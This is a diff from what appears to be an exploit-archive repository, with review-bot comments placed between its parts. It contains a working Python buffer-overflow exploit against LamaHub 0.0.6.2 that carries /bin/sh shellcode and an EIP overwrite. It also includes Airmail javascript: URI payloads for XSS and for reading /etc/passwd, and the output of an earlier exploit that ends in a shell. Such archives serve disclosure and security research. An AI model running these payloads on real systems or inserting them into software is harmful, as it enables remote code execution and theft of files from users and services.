[TCP] Total Data len recv 76
|
||||
[TCP] Request1 len recv 36
|
||||
data1 = <EFBFBD><EFBFBD>foobargooglecom
|
||||
query = foobargooglecom$(<EFBFBD>foobargooglecom
|
||||
data1 = ��foobargooglecom
|
||||
query = foobargooglecom$(�foobargooglecom
|
||||
[TCP] Request2 len recv 36
|
||||
sendto 2
|
||||
data1_reply
|
||||
|
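Review bot: On the data1 and query lines, swapping the literal <EFBFBD> text for the U+FFFD replacement character only changes how the damage is displayed; the original bytes of the captured request are lost either way. If the transcript is meant to document the request, show those bytes as hex escapes instead. The same applies to the next hunk.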
@ -40,8 +40,8 @@ sendto 1
|
|||
TCP Connected with 127.0.0.1:60260
|
||||
[TCP] Total Data len recv 76
|
||||
[TCP] Request1 len recv 36
|
||||
data1 = <EFBFBD><EFBFBD>foobargooglecom
|
||||
query = foobargooglecom$<EFBFBD>7foobargooglecom
|
||||
data1 = ��foobargooglecom
|
||||
query = foobargooglecom$�7foobargooglecom
|
||||
[TCP] Request2 len recv 36
|
||||
sendto 2
|
||||
data1_reply
|
||||
|
@ -49,9 +49,12 @@ data2_reply
|
|||
process 6415 is executing new program: /bin/dash
|
||||
$ id
|
||||
uid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
|
||||
$
|
||||
$
|
||||
|
||||
*/
|
||||
|
||||
|
||||
|
||||
'''
|
||||
|
||||
import socket
|
||||
import time
|
||||
|
@ -235,4 +238,4 @@ if __name__ == "__main__":
|
|||
t.daemon = True
|
||||
t.start()
|
||||
tcp_thread()
|
||||
terminate = True
|
||||
terminate = True
|
85
platforms/linux/remote/40358.py
Executable file
|
@ -0,0 +1,85 @@
|
|||
# Exploit Title: LamaHub-0.0.6.2 BufferOverflow
|
||||
# Date: 09/09/09
|
||||
# Exploit Author: Pi3rrot
|
||||
# Vendor Homepage: http://lamahub.sourceforge.net/
|
||||
# Software Link: http://ovh.dl.sourceforge.net/sourceforge/lamahub/LamaHub-0.0.6.2.tar.gz
|
||||
# Version: 0.0.6.2
|
||||
# Tested on: Debian 8 32bits
|
||||
|
||||
# This exploit may crash the Lamahub service in many cases.
|
||||
# If you compile with -fno-stack-protection and -z execstack
|
||||
# you will be able to execute arbitrary code.
|
||||
#
|
||||
# Thanks to the AFL dev' for making the fuzzer who find the crash ;)
|
||||
# Thanks to gapz for AFL configuration.
|
||||
#
|
||||
# pierre@pi3rrot.net
|
||||
|
||||
|
||||
# How it works ?
|
||||
# Client side:
|
||||
# exploit_writeEIP.py
|
||||
|
||||
# Server side:
|
||||
# ➜ ./server
|
||||
# > init () -> OK
|
||||
# > started on port -> 4111
|
||||
# > new client -> 127.0.0.1 -> 4
|
||||
# $ whoami
|
||||
# pierre
|
||||
# $
|
||||
|
||||
|
||||
import socket
|
||||
|
||||
HOST = 'localhost'
|
||||
PORT = 4111
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
|
||||
buf = ""
|
||||
buf += "\x24\x53\x75\x70\x70\x6f\x72\x74\x73\x20\x55\x73"
|
||||
buf += "\x6c\x6c\x6f\x20\x49\x50\x32\x20\x65\x61\x72\x63"
|
||||
buf += "\x68\x20\x5a\x50\x65\x30\x20\x7c\x24\x4b\x65\x79"
|
||||
buf += "\x61\x7c\x24\x56\x61\x6c\x69\x64\x61\x74\x65\x4e"
|
||||
buf += "\x69\x63\x6b\x20\x50\x69\x65\x72\x72\x65\x7c\x24"
|
||||
buf += "\x56\x65\x6e\x20\x31\x2c\x30\x30\x39\x31\x7c\x24"
|
||||
buf += "\x47\x01\x00\x4e\x3b\x63\x6b\x4c\x69\x73\x74\x7c"
|
||||
buf += "\x24\x4d\x79\x49\x4e\x46\x4f\x20\x24\x41\x4c\x4c"
|
||||
buf += "\x20\x50\x69\x65\x72\x72\x65\x20\x4a\x65"
|
||||
|
||||
#NEED padding of 96
|
||||
shellcode = "\x90" *30
|
||||
shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
|
||||
shellcode += "\x90"*42
|
||||
print "Shellcode len: "
|
||||
print len(shellcode)
|
||||
|
||||
buf2 = "\x61\x3c"
|
||||
buf2 += "\x3c\x24\x4d\x79\x80\x00\x35\x24\x70\x69\x24\x30"
|
||||
buf2 += "\x24\x37\x37\x37\x37\x37\x37\x37\x37\x37\x37\x37"
|
||||
buf2 += "\x37\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1"
|
||||
buf2 += "\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1"
|
||||
buf2 += "\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1"
|
||||
buf2 += "\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1"
|
||||
buf2 += "\xb1\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
|
||||
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
|
||||
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
|
||||
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
|
||||
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
|
||||
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
|
||||
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
|
||||
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
|
||||
|
||||
eip_overwrite = "\x2a\x6a\x06\x08"
|
||||
#eip_overwrite = "AAAA"
|
||||
buf3 = "\xd6\x26\x06\x08\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1"
|
||||
buf3 += "\xb1\xb1\xb1\xb1\x37\x37\x30\x2c\x49\x4e\x46\x4f"
|
||||
buf3 += "\x24\xca\xca\xca\xca\x20\x5a\x50\x65\x30\x20\x7c"
|
||||
buf3 += "\x24\x4b\x65\x79\x61\x7c\x24\x56\x20\x41\x20\x30"
|
||||
buf3 += "\x61\x7c\x24\x56\x69\x63\x6b\x20\x50\x69\xca\xca"
|
||||
buf3 += "\x0a"
|
||||
|
||||
# Send EVIL PACKET !
|
||||
s.sendall(buf + shellcode + buf2 + eip_overwrite + buf3)
|
||||
s.close()
|
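Review bot: The header's "# Date: 09/09/09" reads as 2009, while the files.csv row added for this entry is dated 2016-09-09; write the date unambiguously. In the same header, "-fno-stack-protection" is not the GCC option name, which is -fno-stack-protector, and the comment should say plainly that code execution was only obtained on a build without stack protection and with an executable stack (tested on Debian 8, 32-bit), so readers can tell a crash from real-world code execution when judging impact.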
36
platforms/osx/webapps/40359.txt
Executable file
|
@ -0,0 +1,36 @@
|
|||
Airmail is a popular email client on iOS and OS X.
|
||||
I found a vulnerability in airmail of the latest version which could cause
|
||||
a file:// xss and arbitrary file read.
|
||||
|
||||
Author: redrain, yu.hong@chaitin.com
|
||||
Date: 2016-08-15
|
||||
Version: 3.0.2 and earlier
|
||||
Platform: OS X and iOS
|
||||
Site: http://airmailapp.com/
|
||||
Vendor: http://airmailapp.com/
|
||||
Vendor Notified: 2016-08-15
|
||||
|
||||
Vulnerability:
|
||||
There is a file:// xss in airmail version 3.0.2 and earlier.
|
||||
The app can deal the URLscheme render with link detection, any user can
|
||||
edit the email content in reply with the evil code with the TL;DR.
|
||||
|
||||
Airmail implements its user interface using an embedded version of WebKit,
|
||||
furthermore Airmail on OS X will render any URI as a clickable HTML <a
|
||||
href= link. An attacker can create a simple JavaScript URI (e.g.,
|
||||
javascript:) which when clicked grants the attacker initial JavaScript
|
||||
execution (XSS) in the context of the application DOM.
|
||||
|
||||
|
||||
PoC:
|
||||
javascript://www.baidu.com/research?%0Aprompt(1)
|
||||
|
||||
a
|
||||
|
||||
Arbitrary file read:
|
||||
|
||||
javascript://www.baidu.com/research?%0Afunction%20reqListener%20()%20%7B%0A%
|
||||
20%20prompt(this.responseText)%3B%0A%7D%0Avar%20oReq%20%3D%
|
||||
20new%20XMLHttpRequest()%3B%0AoReq.addEventListener(%
|
||||
22load%22%2C%20reqListener)%3B%0AoReq.open(%22GET%22%2C%
|
||||
20%22file%3A%2F%2F%2Fetc%2Fpasswd%22)%3B%0AoReq.send()%3B
|
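Review bot: The advisory records "Vendor Notified: 2016-08-15" but says nothing about a vendor response or a fixed version, so a reader cannot tell whether anything later than 3.0.2 is safe; add the fix status. The sentence "any user can edit the email content in reply with the evil code with the TL;DR" is unclear about who has to do what, and the stray line "a" after the first PoC looks like residue of an HTML anchor and should be removed or explained.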